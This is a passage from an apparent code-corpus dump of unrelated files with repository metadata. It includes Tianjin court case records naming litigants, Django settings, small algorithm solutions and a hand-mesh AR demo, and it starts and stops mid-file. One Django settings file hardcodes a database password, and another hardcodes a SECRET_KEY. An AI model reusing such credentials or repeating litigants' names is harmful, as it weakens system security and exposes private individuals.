"baspt": "06 ",
"larq": "2018-01-24T16:00:00.000+0000",
"jarq": "2018-03-27T07:03:19.000+0000"
},
{
"ajxh": 62387,
"ah": "(2018)津民申591号",
"ajmc": "李艳卜与天津市保安服务总公司河西分公司劳动争议",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-24T16:00:00.000+0000",
"jarq": "2018-04-04T08:28:39.000+0000"
},
{
"ajxh": 62243,
"ah": "(2018)津民申497号",
"ajmc": "天津金地康成投资有限公司与李睿雅劳动争议",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-22T16:00:00.000+0000",
"jarq": "2018-04-04T08:28:19.000+0000"
},
{
"ajxh": 62245,
"ah": "(2018)津民申499号",
"ajmc": "宋金美与天津达璞瑞科技有限公司劳动争议纠纷",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-22T16:00:00.000+0000",
"jarq": "2018-03-27T07:02:41.000+0000"
},
{
"ajxh": 62101,
"ah": "(2018)津民申430号",
"ajmc": "天津众起模具制造有限公司,张义宽劳动争议",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-17T16:00:00.000+0000",
"jarq": "2018-03-27T07:02:18.000+0000"
},
{
"ajxh": 62115,
"ah": "(2018)津民申441号",
"ajmc": "许莹,天津市弘野建筑工程有限公司,天津市塘沽海洋高新技术开发总公司建设工程施工合同纠纷",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-17T16:00:00.000+0000",
"jarq": "2018-04-16T08:19:09.000+0000"
},
{
"ajxh": 62090,
"ah": "(2018)津民申420号",
"ajmc": "陈志森,天津利顺德大饭店有限公司劳动争议",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-16T16:00:00.000+0000",
"jarq": "2018-04-10T06:27:09.000+0000"
},
{
"ajxh": 61755,
"ah": "(2018)津民申206号",
"ajmc": "白雪樱与天津市外国企业专家服务有限公司开发区分公司,天津瑞金国际学校,新地平线国际教育管理(天津)有限公司等劳动争议纠纷",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-10T16:00",
"jarq": "2018-04-10T06:27:09.000+0000"
},
{
"ajxh": 62578,
"ah": "(2018)津民申646号",
"ajmc": "陕西瑞中贸易有限公司,天津京铁火车头足球俱乐部有限公司不当得利纠纷",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-02-05T16:00:00.000+0000",
"jarq": "2018-04-23T08:16:04.000+0000"
},
{
"ajxh": 62479,
"ah": "(2018)津民终83号",
"ajmc": "天津市润辉建筑发展有限公司与王作录建设工程分包合同纠纷",
"ajxz": "2",
"spcx": "2",
"spcxdz": "29",
"baspt": "06 ",
"larq": "2018-01-29T16:00:00.000+0000",
"jarq": "2018-07-26T09:28:27.000+0000"
},
{
"ajxh": 62376,
"ah": "(2018)津民申583号",
"ajmc": "张树强与南开大学人事争议",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-24T16:00:00.000+0000",
"jarq": "2018-03-27T07:03:19.000+0000"
},
{
"ajxh": 62387,
"ah": "(2018)津民申591号",
"ajmc": "李艳卜与天津市保安服务总公司河西分公司劳动争议",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-24T16:00:00.000+0000",
"jarq": "2018-04-04T08:28:39.000+0000"
},
{
"ajxh": 62243,
"ah": "(2018)津民申497号",
"ajmc": "天津金地康成投资有限公司与李睿雅劳动争议",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-22T16:00:00.000+0000",
"jarq": "2018-04-04T08:28:19.000+0000"
},
{
"ajxh": 62115,
"ah": "(2018)津民申441号",
"ajmc": "许莹,天津市弘野建筑工程有限公司,天津市塘沽海洋高新技术开发总公司建设工程施工合同纠纷",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-17T16:00:00.000+0000",
"jarq": "2018-04-16T08:19:09.000+0000"
},
{
"ajxh": 62245,
"ah": "(2018)津民申499号",
"ajmc": "宋金美与天津达璞瑞科技有限公司劳动争议纠纷",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-22T16:00:00.000+0000",
"jarq": "2018-03-27T07:02:41.000+0000"
},
{
"ajxh": 62101,
"ah": "(2018)津民申430号",
"ajmc": "天津众起模具制造有限公司,张义宽劳动争议",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-17T16:00:00.000+0000",
"jarq": "2018-03-27T07:02:18.000+0000"
},
{
"ajxh": 62115,
"ah": "(2018)津民申441号",
"ajmc": "许莹,天津市弘野建筑工程有限公司,天津市塘沽海洋高新技术开发总公司建设工程施工合同纠纷",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-17T16:00:00.000+0000",
"jarq": "2018-04-16T08:19:09.000+0000"
},
{
"ajxh": 62090,
"ah": "(2018)津民申420号",
"ajmc": "陈志森,天津利顺德大饭店有限公司劳动争议",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-16T16:00:00.000+0000",
"jarq": "2018-04-10T06:27:09.000+0000"
},
{
"ajxh": 61755,
"ah": "(2018)津民申206号",
"ajmc": "白雪樱与天津市外国企业专家服务有限公司开发区分公司,天津瑞金国际学校,新地平线国际教育管理(天津)有限公司等劳动争议纠纷",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-01-10T16:00",
"jarq": "2018-04-10T06:27:09.000+0000"
}
]
}
# jsonData = json.load(data)
titles = ['案号', '案件名称', '立案日期', '结案日期']
keys = ['ah', 'ajmc', 'larq', 'jarq']
# print(data['object'])
pageView = PageView(data['object'], titles, keys)
pageView.renderData()
# # pageView.renderTable()
pageView.show()
sys.exit(app.exec_())
|
[
"2229238008@qq.com"
] |
2229238008@qq.com
|
366f05348d78f59d0cfb7084d1df801404cd8b81
|
7bc54bae28eec4b735c05ac7bc40b1a8711bb381
|
/src/tlm/ukp/data_gen/token_as_label_payload_worker.py
|
81026196e20a97d70f190756bed467c07997b9b6
|
[] |
no_license
|
clover3/Chair
|
755efd4abbd5f3f2fb59e9b1bc6e7bc070b8d05e
|
a2102ebf826a58efbc479181f1ebb5de21d1e49f
|
refs/heads/master
| 2023-07-20T17:29:42.414170
| 2023-07-18T21:12:46
| 2023-07-18T21:12:46
| 157,024,916
| 0
| 0
| null | 2023-02-16T05:20:37
| 2018-11-10T21:55:29
|
Python
|
UTF-8
|
Python
| false
| false
| 2,226
|
py
|
import os
import data_generator
from data_generator import job_runner
from data_generator.argmining.ukp import DataLoader
from data_generator.tokenizer_wo_tf import get_tokenizer
from list_lib import lmap
from tlm.data_gen.base import truncate_seq_pair
from tlm.data_gen.label_as_token_encoder import encode_label_and_token_pair
from tlm.data_gen.lm_datagen import UnmaskedPairedDataGen, SegmentInstance
class UkpTokenAsLabelGenerator(UnmaskedPairedDataGen):
def __init__(self):
super(UkpTokenAsLabelGenerator, self).__init__()
self.ratio_labeled = 0.1 # Probability of selecting labeled sentence
def create_instances(self, topic, labeled_data):
topic_tokens = self.tokenizer.tokenize(topic.replace("_", " "))
max_num_tokens = self.max_seq_length - 3 - len(topic_tokens)
target_seq_length = max_num_tokens
instances = []
for label, tokens_b in labeled_data:
tokens_a = []
truncate_seq_pair(tokens_a, tokens_b, target_seq_length, self.rng)
swap = False
tokens, segment_ids = encode_label_and_token_pair(topic_tokens, label, tokens_b, tokens_a, swap)
instance = SegmentInstance(
tokens=tokens,
segment_ids=segment_ids)
instances.append(instance)
return instances
class UkpTokenLabelPayloadWorker(job_runner.WorkerInterface):
def __init__(self, out_path, generator):
self.out_dir = out_path
self.generator = generator
def work(self, job_id):
topic = data_generator.argmining.ukp_header.all_topics[job_id]
ukp_data = self.get_ukp_dev_sents(topic)
insts = self.generator.create_instances(topic, ukp_data)
output_file = os.path.join(self.out_dir, topic.replace(" ", "_"))
self.generator.write_instances(insts, output_file)
def get_ukp_dev_sents(self, topic):
loader = DataLoader(topic)
data = loader.get_dev_data()
tokenizer = get_tokenizer()
def encode(e):
sent, label = e
tokens = tokenizer.tokenize(sent)
return label, tokens
label_sent_pairs = lmap(encode, data)
return label_sent_pairs
|
[
"lesterny@gmail.com"
] |
lesterny@gmail.com
|
88a76d162c799f38313d04a0f33fb0b576f56b9a
|
940ad5e16ede0c344066c8f41f8b9788061bb0ec
|
/ABC133/a.py
|
bebb98ff398643d8b87c968f10d7e19a35911241
|
[] |
no_license
|
niwanowa/AtCoder
|
03fe69c97d5503aabb5a3a42ee40c9824b128289
|
f4218cf7e13d026a2a439a82340e208c10f5cef5
|
refs/heads/master
| 2021-07-24T05:23:40.624506
| 2020-05-12T12:36:01
| 2020-05-12T12:36:01
| 167,095,703
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 51
|
py
|
N, A, B = map(int, input().split())
# total cost: N tickets at A yen each vs. a flat fare of B yen; take the cheaper
print(min(B, N * A))
|
[
"58393481+kyuto-ja@users.noreply.github.com"
] |
58393481+kyuto-ja@users.noreply.github.com
|
1897f88ad015c004be99c47772f7326fbf9769c2
|
837ab6d73fd951f47038851c8c32db5cd33ee955
|
/backend/common/command/user_point_update_command.py
|
7b04c13d82b363929e1daf97e5d1b24e2d0a26fc
|
[] |
no_license
|
swsnu/swpp2019-team16
|
6932ddc89f5513cff1dc90febb1d3f308cf991f9
|
c7c9e91be036f1c78c94d57755eb45537c2b29ad
|
refs/heads/master
| 2023-01-07T18:58:38.399582
| 2019-12-14T13:19:13
| 2019-12-14T13:19:13
| 206,933,906
| 5
| 11
| null | 2023-01-04T12:22:36
| 2019-09-07T07:43:03
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 507
|
py
|
from .command import Command
USER_POINT_UPDATE_COMMAND = 'command.user_point_update'
class UserPointUpdateCommand(Command):
def __init__(self, user_id, point):
super().__init__(USER_POINT_UPDATE_COMMAND)
self._user_id = user_id
self._point = point
@property
def user_id(self):
return self._user_id
@property
def point(self):
return self._point
def __str__(self):
return 'user_id={},point={}'.format(self._user_id, self._point)
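# Illustrative usage:
#   cmd = UserPointUpdateCommand(user_id='user-1', point=42)
#   str(cmd)  # -> 'user_id=user-1,point=42'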
|
[
"43679861+dkim94@users.noreply.github.com"
] |
43679861+dkim94@users.noreply.github.com
|
61554408c0eb98c3e6251f605e72cf95bb1bbd1c
|
6692019df03c08d57a533250500c9624b9ef42f5
|
/testedio/local.py
|
53a7878b64a85b054b9c4eee6e64c8bf5dce943f
|
[] |
no_license
|
alifanov/testedio
|
bc009d28c2b833103ebc4156f1d182034bcf60db
|
fdfbd4af98bb77fa859345368917ee2a7510f8b0
|
refs/heads/master
| 2020-06-20T01:22:30.863510
| 2016-11-27T14:44:03
| 2016-11-27T14:44:03
| 74,890,107
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 786
|
py
|
# -*- coding: utf-8 -*-
DEBUG = True
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
DATABASES = {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.postgis',
'NAME': 'testeddb',
'USER': 'testeduser',
'PASSWORD': 'oP1eisaiael3Sohz',
'HOST': '127.0.0.1',
'CONN_MAX_AGE': 300,
}
}
|
[
"lifanov.a.v@gmail.com"
] |
lifanov.a.v@gmail.com
|
e609e60eb27278d53ee2daa281255ee2a724f9e8
|
6c2818dfe861e4091ade259ce003aba576ce1d58
|
/dj_rapidapp/settings.py
|
225fc31265df557bc63df7dc775d2c02ad33a13d
|
[
"MIT"
] |
permissive
|
urkh/dj_rapidapp
|
3a3d7a7597553183e7f1e4b779ae660365b9577a
|
baa367823b16bc4709103a898cddd281051959c2
|
refs/heads/master
| 2021-03-27T10:22:07.357525
| 2015-05-09T05:52:00
| 2015-05-09T05:52:00
| 28,834,817
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,093
|
py
|
"""
Django settings for dj_rapidapp project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '9&1cllglx)6gbweky)qzedhak(iyas$*=-delzj%kh8s()qq&w'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'core',
'modules.designer',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'dj_rapidapp.urls'
WSGI_APPLICATION = 'dj_rapidapp.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
|
[
"gust989@gmail.com"
] |
gust989@gmail.com
|
e7da783c225cf27febaea8e230005621d565444d
|
58f1cb1761d4e7114bbe0cc54195fc3bf72ccc4d
|
/python_solution/171_180/DungeonGame.py
|
01e8e864c3b0a512d4b93f35dd5c279960ff390f
|
[] |
no_license
|
CescWang1991/LeetCode-Python
|
4e2e9b1872ef92d128c681c1ed07db19938b1ef5
|
0584b86642dff667f5bf6b7acfbbce86a41a55b6
|
refs/heads/master
| 2020-03-31T02:37:12.065854
| 2019-04-24T02:33:15
| 2019-04-24T02:33:15
| 151,832,885
| 1
| 1
| null | 2019-04-15T06:34:41
| 2018-10-06T11:22:49
|
Python
|
UTF-8
|
Python
| false
| false
| 1,308
|
py
|
# 174. Dungeon Game
# Dynamic Programming:
# Traverse backwards starting from the bottom-right corner; dp[i][j] is the minimum HP
# needed on arrival at cell [i,j], and dp[i][j] is always >= 1.
# If dungeon[i][j] is negative, dp[i][j] = min(dp[i+1][j], dp[i][j+1]) - dungeon[i][j],
# i.e. the smaller of the right/down requirements minus dungeon[i][j].
# If dungeon[i][j] is positive and dp[i][j] would drop below 1, clamp it to 1.
class Solution:
def calculateMinimumHP(self, dungeon):
"""
:type dungeon: List[List[int]]
:rtype: int
"""
if not dungeon or not dungeon[0]:
return 1
m = len(dungeon)
n = len(dungeon[0])
dp = [[0] * n for i in range(m)]
dp[m-1][n-1] = -dungeon[m-1][n-1]+1 if dungeon[m-1][n-1] < 0 else 1
for i in reversed(range(m - 1)):
dp[i][n-1] = dp[i+1][n-1] - dungeon[i][n-1]
dp[i][n-1] = 1 if dp[i][n-1] <= 0 else dp[i][n-1]
for j in reversed(range(n - 1)):
dp[m-1][j] = dp[m-1][j+1] - dungeon[m-1][j]
dp[m-1][j] = 1 if dp[m-1][j] <= 0 else dp[m-1][j]
for i in reversed(range(m - 1)):
for j in reversed(range(n - 1)):
dp[i][j] = min(dp[i+1][j], dp[i][j+1]) - dungeon[i][j]
dp[i][j] = 1 if dp[i][j] <= 0 else dp[i][j]
return dp[0][0]
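# Illustrative check: for the classic grid [[-2, -3, 3], [-5, -10, 1], [10, 30, -5]]
# the knight needs an initial HP of 7 (path right -> right -> down -> down):
#   Solution().calculateMinimumHP([[-2, -3, 3], [-5, -10, 1], [10, 30, -5]])  # -> 7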
|
[
"cescwang1991@gmail.com"
] |
cescwang1991@gmail.com
|
0eb9f2f1d94a4eb053ed1d47b6656a5e43094f17
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/Projects/Learn/PyCharm/Algorithmic Toolbox/Greedy Algorithms/Maximum Number of Prizes/maximum_number_of_prizes.py
|
7d5a1b2fea1e80689bd1231f2652fd7b5ea7c8b9
|
[
"LicenseRef-scancode-other-permissive"
] |
permissive
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137
| 2023-08-28T23:50:57
| 2023-08-28T23:50:57
| 267,368,545
| 2
| 1
| null | 2022-09-08T15:20:18
| 2020-05-27T16:18:17
| null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:0364270870b82331956a2b84ff0aabc4b589ce630df5b152845ae2a98acf8167
size 300
|
[
"nateweiler84@gmail.com"
] |
nateweiler84@gmail.com
|
8904156b5ce473631854fb7c9c76a996702066ad
|
f3033e5dd3033613a17c9fe9752d7f1f15bbd78a
|
/funciones/documentacion.py
|
2426b0dcb9c17260ac1079e5327f29bf984cc2ab
|
[] |
no_license
|
vidalchile/curso-profesional-de-python
|
785a19929424abe6400b32ab21be088da1e729a8
|
3db500a31bf35b3f95317ac39ab1620598917f95
|
refs/heads/master
| 2022-03-22T03:43:00.469096
| 2019-10-09T01:23:11
| 2019-10-09T01:23:11
| 183,976,273
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 567
|
py
|
# Getting the most out of our documentation.
"""
We store the functions in a dictionary, then iterate over the
dictionary's items and print each function's documentation string.
"""
def suma(a, b):
    """Addition function (documentation)"""
    return a + b
def resta(a, b):
    """Subtraction function (documentation)"""
    return a - b
opciones = {'a': suma, 'b': resta}
print("Enter the desired option")
for opcion, funcion in opciones.items():
    mensaje = '{}) {}'.format(opcion, funcion.__doc__)
    print(mensaje)
opcion = input("Option: ")
|
[
"cris.vidal04@gmail.com"
] |
cris.vidal04@gmail.com
|
5e442222c9d6447fd16a6d9160111d2eb813d625
|
c0fdd5675bf262f36a22c648cee4c9ec34d2f218
|
/test_video/mesh_demo.py
|
390203a23e044edeb235bc98fc3eda3b9b9d40f7
|
[] |
no_license
|
mfkiwl/handAR
|
5917c6ef69693f4d8287c57b3a6b6742c7943179
|
b04f4aee7e39ef920d5eba1873a2b172f20f7060
|
refs/heads/main
| 2023-08-11T12:16:50.744158
| 2021-10-11T16:41:33
| 2021-10-11T16:41:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,081
|
py
|
import sys
import os
import os.path as osp
import argparse
import numpy as np
import cv2
import torch
import torchvision.transforms as transforms
from torch.nn.parallel.data_parallel import DataParallel
import torch.backends.cudnn as cudnn
import PIL
from PIL import Image
sys.path.insert(0, osp.join('..', 'main'))
sys.path.insert(0, osp.join('..', 'data'))
sys.path.insert(0, osp.join('..', 'common'))
from config import cfg
from utils.preprocessing import process_bbox, generate_patch_image
from utils.transforms import pixel2cam, cam2pixel
from utils.mano import MANO
# sys.path.insert(0, cfg.smpl_path)
sys.path.insert(0, cfg.mano_path)
# from smplpytorch.pytorch.smpl_layer import SMPL_Layer
from utils.manopth.manopth.manolayer import ManoLayer
from utils.vis import vis_mesh, save_obj, vis_keypoints_with_skeleton
from canvas import Canvas
import vispy
from vispy import app, io, gloo, scene, visuals
from vispy.util.transforms import perspective, translate, rotate, ortho, scale
import matplotlib.pyplot as plt
import math
cfg.set_args('0', 'lixel')
cudnn.benchmark = True
origin = False
joint_num = 21
# MANO mesh
vertex_num = 778
mano_layer = ManoLayer(ncomps=45, mano_root=cfg.mano_path + '/mano/models')
face = mano_layer.th_faces.numpy()
joint_regressor = mano_layer.th_J_regressor.numpy()
root_joint_idx = 0
model_path = '../weights/snapshot_%d.pth.tar' % 24
assert osp.exists(model_path), 'Cannot find model at ' + model_path
print('Load checkpoint from {}'.format(model_path))
from model_no_render import get_model
model = get_model(vertex_num, joint_num, 'test')
model = DataParallel(model).cuda()
ckpt = torch.load(model_path)
model.module.pose_backbone.load_state_dict(ckpt['pose_backbone'])
model.module.pose_net.load_state_dict(ckpt['posenet'])
model.module.pose2feat.load_state_dict(ckpt['pose2feat'])
model.module.mesh_backbone.load_state_dict(ckpt['mesh_backbone'])
model.module.mesh_net.load_state_dict(ckpt['mesh_net'])
model.module.gcn.load_state_dict(ckpt['gcn'])
model.module.global_img_feat.load_state_dict(ckpt['global_img_feat'])
model.module.segmentation_net.load_state_dict(ckpt['segmentation_net'])
model.eval()
# Set the cuda device
if torch.cuda.is_available():
device = torch.device("cuda:0")
torch.cuda.set_device(device)
else:
device = torch.device("cpu")
transform = transforms.ToTensor()
def pil2opencv(img):
open_cv_image = np.array(img)
open_cv_image = open_cv_image[:, :, ::-1].copy()
return open_cv_image
def opencv2pil(img):
pil_img = Image.fromarray(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
return pil_img
def depth_buffer_to_absolute_depth(depth_buffer, near=1, far=100):
depth = np.divide(depth_buffer, 255.0)
z_ndc = np.subtract(np.multiply(depth, 2), 1)
z_eye = np.divide(2 * near * far, np.subtract(near + far, np.multiply(z_ndc, far - near)))
return z_eye
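# Worked example (illustrative): with near=1 and far=100, a buffer value of 128
# (≈0.5 after normalising) maps to z_eye = 200 / (101 - 0.0039*99) ≈ 1.99, far
# from the midpoint ~50: depth-buffer precision concentrates near the camera.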
brightness = contrast = 1.0
start_recording = False
video = []
mesh = []
c = Canvas(mesh_name='hand', has_texture=False)
faces = c.mesh.get_faces()
old2new_matching = np.load('matching.npy').astype(int)  # np.int was removed in NumPy 1.24; plain int is equivalent
pos_window_tvec = []
pos_window_rvec = []
def tvec_smoothing(tvec):
alpha = 0.7
if np.isnan(tvec).any():
return pos_window_tvec[-1]
if len(pos_window_tvec) < 4:
pos_window_tvec.append(np.array(tvec))
return np.array(tvec)
else:
curr_tvec = np.array([0, 0, 0])
para = 0
for i in range(0, 4):
curr_tvec = np.add(curr_tvec, np.multiply(pos_window_tvec[3 - i], math.pow((1 - alpha), i + 1)))
para += math.pow((1 - alpha), i + 1)
curr_tvec = np.add(np.multiply(tvec, alpha), np.multiply(curr_tvec, alpha))
curr_tvec /= (para * alpha + alpha)
pos_window_tvec.pop(0)
pos_window_tvec.append(curr_tvec)
return curr_tvec
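# Note (illustrative): tvec_smoothing is an exponentially weighted moving average:
# the current tvec gets relative weight 1, the i-th past frame gets weight
# (1 - alpha)^(i + 1), and the final division renormalises the weights to sum to 1.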
def rvec_smoothing(rvec):
    alpha = 0.7
if len(pos_window_rvec) < 8:
pos_window_rvec.append(np.array(rvec))
return np.array(rvec)
else:
curr_rvec = [0, 0, 0]
para = 0
for i in range(0, 8):
curr_rvec = np.add(curr_rvec, np.multiply(pos_window_rvec[7 - i], math.pow((1 - alpha), i + 1)))
para += math.pow((1 - alpha), i + 1)
curr_rvec = np.add(np.multiply(rvec, alpha), np.multiply(curr_rvec, alpha))
curr_rvec /= (para * alpha + alpha)
# curr_rvec = np.divide(curr_rvec, alpha + alpha * para)
pos_window_rvec.pop(0)
pos_window_rvec.append(curr_rvec)
return curr_rvec
front_triangle_index = 761
back_triangle_index = 755
middle_finder_major = [395, 364]
hand_layer = MANO()
links = ( (0,1), (0,5), (0,9), (0,13), (0,17), (1,2), (2,3), (3,4), (5,6), (6,7), (7,8), (9,10), (10,11), (11,12), (13,14), (14,15), (15,16), (17,18), (18,19), (19,20) )
import scipy.io as scio
V = c.mesh.V.copy()
hand_mesh = np.zeros((778, 3))
for i in range(778):
hand_mesh[i] = V[:]['a_position'][old2new_matching[i], :3]
origin_joint = np.dot(hand_layer.joint_regressor, hand_mesh)
# Palm
origin_x = V[:]['a_position'][144, :3] - V[:]['a_position'][145, :3]
origin_x = origin_x / np.linalg.norm(origin_x)
origin_y = V[:]['a_position'][144, :3] - V[:]['a_position'][146, :3]
origin_y = origin_y / np.linalg.norm(origin_y)
origin_z = np.cross(origin_x, origin_y)
origin_z = origin_z / np.linalg.norm(origin_z)
origin_y = np.cross(origin_x, origin_z)
origin_y = origin_y / np.linalg.norm(origin_y)
M_o = np.array([[origin_x[0], origin_x[1], origin_x[2]],
[origin_y[0], origin_y[1], origin_y[2]],
[origin_z[0], origin_z[1], origin_z[2]]])
for kkk in range(0, 100):
img_path = '../imgs/' + str(kkk).zfill(4) + '.png'
    original_img = cv2.imread('imgs/' + img_path)  # note: 'imgs/' + '../imgs/XXXX.png' resolves to './imgs/XXXX.png'
original_img = original_img[:320, :320]
original_img = cv2.resize(original_img, (320, 320))
frame = original_img
original_img_height, original_img_width = original_img.shape[:2]
h, w = frame.shape[0], frame.shape[1]
if h < w:
frame = frame[:, int((w - h) / 2):int((w + h) / 2)]
else:
frame = frame[int((h - w) / 2):int((h + w) / 2), :]
frame = cv2.resize(frame, (320, 320))
pil_hand_frame = opencv2pil(frame)
pil_hand_frame = PIL.ImageEnhance.Brightness(pil_hand_frame).enhance(brightness)
pil_hand_frame = PIL.ImageEnhance.Color(pil_hand_frame).enhance(contrast)
frame = pil2opencv(pil_hand_frame)
original_img = frame
original_img_height, original_img_width = original_img.shape[:2]
bbox = [0, 0, 320, 320] # xmin, ymin, width, height
bbox = process_bbox(bbox, original_img_width, original_img_height)
img, img2bb_trans, bb2img_trans = generate_patch_image(original_img, bbox, 1.0, 0.0, False, cfg.input_img_shape)
bbox_img = img.copy()
img = transform(img.astype(np.float32)) / 255
img = img.cuda()[None, :, :, :]
# forward
inputs = {'img': img}
targets = {}
meta_info = {'bb2img_trans': bb2img_trans}
with torch.no_grad():
out = model(inputs, targets, meta_info, 'test')
img = img[0].cpu().numpy().transpose(1, 2, 0) # cfg.input_img_shape[1], cfg.input_img_shape[0], 3
if origin:
mesh_lixel_img = out['mesh_coord_img'][0].cpu().numpy()
else:
# mesh_lixel_img = out['mesh_coord_img'][0].cpu().numpy()
mesh_lixel_img = out['gcn'][0].cpu().numpy()
test = mesh_lixel_img.copy()
#
if not origin:
joint = out['pose'][0].cpu().numpy()
else:
joint = out['joint_coord_img'][0].cpu().numpy()
pred_joint = joint.copy()
# print(joint)
# np.save(str(kkk) + '.npy', joint[:, :2])
# restore mesh_lixel_img to original image space and continuous depth space
mesh_lixel_img[:, 0] = mesh_lixel_img[:, 0] / cfg.output_hm_shape[2] * cfg.input_img_shape[1]
mesh_lixel_img[:, 1] = mesh_lixel_img[:, 1] / cfg.output_hm_shape[1] * cfg.input_img_shape[0]
mesh_lixel_img[:, :2] = np.dot(bb2img_trans,
np.concatenate((mesh_lixel_img[:, :2], np.ones_like(mesh_lixel_img[:, :1])),
1).transpose(1, 0)).transpose(1, 0)
mesh_lixel_img[:, 2] = (mesh_lixel_img[:, 2] / cfg.output_hm_shape[0] * 2. - 1) * (cfg.bbox_3d_size / 2)
joint[:, 0] = joint[:, 0] / cfg.output_hm_shape[2] * cfg.input_img_shape[1]
joint[:, 1] = joint[:, 1] / cfg.output_hm_shape[1] * cfg.input_img_shape[0]
joint[:, :2] = np.dot(bb2img_trans,
np.concatenate((joint[:, :2], np.ones_like(joint[:, :1])),
1).transpose(1, 0)).transpose(1, 0)
# visualize lixel mesh in 2D space
vis_img = original_img.copy().astype(np.uint8)
# res[np.where((res==(255, 255, 255)).all(axis=2))] = vis_img[np.where((res==(255, 255, 255)).all(axis=2))]
# vis_img = cv2.addWeighted(vis_img, 0.5, res, 0.5, 0)
vis_img = vis_mesh(vis_img, mesh_lixel_img)
joint_img = original_img.copy().astype(np.uint8)
joint_img = vis_keypoints_with_skeleton(joint_img, joint, links)
c.view = c.default_view
c.program['u_view'] = c.view
c.program['u_mat_rendering'] = 0.0
homo_coord = np.append(mesh_lixel_img, np.ones((mesh_lixel_img.shape[0], 1)), axis=1)
old2new_coord = np.zeros((778, 4))
for i in range(778):
old2new_coord[old2new_matching[i]] = homo_coord[i]
# mapped_coord = np.zeros((c.mapping.shape[0], 4))
# mapped_coord = np.zeros((958, 4))
mapped_coord = np.zeros((c.mapping.shape[0], 4))
# mapped_coord = np.zeros((778, 4))
for i in range(mapped_coord.shape[0]):
mapped_coord[i] = old2new_coord[int(c.mapping[i]) - 1]
mapped_coord[:, :2] = mapped_coord[:, :2] / 320 * 2 - 1
mapped_coord[:, 1] *= -1
# mapped_coord[:, :2] *= 1.04
mapped_coord[:, 2] *= 2.5 # Thickness Hacking
V = c.mesh.V.copy()
######################
# Old Hand Mesh
######################
scale = 0.4 # paddle
V[:]['a_position'][mapped_coord.shape[0]:, :3] -= V[:]['a_position'][145, :3]
# Scale
